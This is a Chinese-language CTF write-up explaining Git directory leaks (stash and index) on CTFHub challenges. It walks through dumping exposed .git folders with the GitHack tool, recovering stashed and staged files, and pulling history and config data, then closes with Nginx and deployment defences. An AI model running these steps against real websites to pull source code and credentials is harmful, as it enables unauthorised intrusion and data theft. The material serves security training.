CTFHub Git泄露实战:Stash和Index漏洞利用全解析(附BugScanTeam GitHack教程)
CTFHub Git泄露实战:Stash和Index漏洞利用全解析
在CTF比赛中,Git泄露漏洞一直是Web安全方向的高频考点。这类漏洞往往源于开发人员的配置失误,将包含敏感信息的.git目录直接暴露在线上环境。本文将深入剖析Git泄露中两种特殊类型——Stash和Index的漏洞原理与实战利用技巧,并手把手教你使用BugScanTeam的GitHack工具进行高效渗透测试。
1. Git泄露漏洞概述
.git目录是Git版本控制系统的核心存储库,默认包含以下关键数据:
- objects/:存储所有Git对象(提交、树、blob)
- refs/:包含分支和标签的引用指针
- logs/:记录所有引用变更历史
- index:暂存区(stage)文件
- stash:存储未提交的临时变更
当这些文件被意外部署到生产环境时,攻击者可以通过重建Git仓库获取:
- 完整的源代码历史记录
- 数据库连接凭证等敏感配置
- 未提交的临时修改内容
- 开发者的本地分支信息
# 典型.git目录结构示例 .git/ ├── HEAD ├── config ├── description ├── hooks/ ├── info/ ├── objects/ │ ├── pack/ │ └── info/ └── refs/ ├── heads/ └── tags/注意:在CTF比赛中,组织方通常会故意配置错误的.git权限作为题目,但在真实环境中发现此类漏洞应遵循负责任的披露流程。
2. Stash泄露漏洞深度解析
2.1 Stash机制原理
Git的stash功能允许开发者临时保存工作目录的未提交变更,常见使用场景包括:
- 快速切换分支处理紧急问题
- 保存实验性代码而不产生提交记录
- 临时清理工作区进行测试
当执行git stash命令时,Git会:
- 将工作目录和暂存区的修改保存为新的commit对象
- 将这些commit存储在
.git/refs/stash引用中 - 回滚工作目录到最近一次提交状态
# 查看存在的stash记录 git stash list stash@{0}: WIP on main: 5002d47 初始提交 stash@{1}: On dev: 未完成的登录功能2.2 CTF中的Stash利用实战
以CTFHub题目为例,完整利用流程如下:
下载GitHack工具:
git clone https://github.com/BugScanTeam/GitHack.git cd GitHack扫描目标站点:
python GitHack.py http://challenge.ctfhub.com:10080/.git/分析生成的仓库:
cd challenge.ctfhub.com_10080 git stash list # 查看存在的stash记录恢复隐藏内容:
git stash pop # 恢复最新stash并删除记录 # 或指定特定stash git stash apply stash@{1}查找flag:
find . -name "*.txt" # 检查新增文件
关键技巧对比:
| 命令 | 作用 | 是否删除记录 | 适用场景 |
|---|---|---|---|
stash pop | 恢复并删除记录 | 是 | 确定不再需要该stash时 |
stash apply | 仅恢复内容 | 否 | 需要多次测试不同stash时 |
3. Index泄露漏洞攻防详解
3.1 Git暂存区工作机制
Index(又称stage)是Git特有的暂存区域,其核心特点包括:
- 充当工作目录与版本库的中间层
- 存储下一次提交的精确快照
- 内容保存在
.git/index二进制文件中 - 可通过
git ls-files --stage查看详细内容
# 查看暂存区文件状态 git status # 查看暂存区具体内容 git ls-files --stage 100644 78981922613b2afb6025042ff6bd878ac1994e85 0 flag.txt3.2 Index漏洞利用实践
针对CTFHub的Index题目,标准解题步骤为:
使用GitHack下载仓库:
python GitHack.py http://challenge.ctfhub.com:10081/.git/检查暂存区内容:
cd challenge.ctfhub.com_10081 git status # 查看未被提交的变更直接提取flag:
git diff --cached # 查看暂存区差异 # 或直接检查文件系统 cat flag.txt
常见问题排查表:
| 现象 | 可能原因 | 解决方案 |
|---|---|---|
| 无flag文件 | Index未被修改 | 检查其他Git泄露类型 |
| 文件为空 | 可能被部分提交 | 尝试git fsck检查悬空对象 |
| 权限错误 | 文件系统限制 | 使用git show查看对象内容 |
4. 高级利用技巧与防御方案
4.1 组合利用技巧
历史记录深度挖掘:
git reflog # 查看所有引用变更历史 git fsck --lost-found # 检查悬空对象分支信息收集:
git branch -av # 查看所有分支 git checkout origin/dev # 切换到远程分支配置信息提取:
git config -l # 查看仓库配置 cat .git/config # 直接读取配置文件
4.2 防御最佳实践
对于开发人员,建议采取以下防护措施:
服务器配置:
# Nginx禁止访问.git目录 location ~ /\.git { deny all; return 403; }部署前检查:
# 检查部署包是否包含.git find . -name ".git" -type d使用清理工具:
# 使用git自带清理命令 git clean -fdx
在CTF比赛中遇到这类题目时,我的经验是首先确认.git目录可访问,然后系统性地检查以下位置:
HEAD和refs/指向的commit对象- 未提交的stash记录
- 暂存区(index)内容
- 各分支的差异比较
- 悬空对象(dangling objects)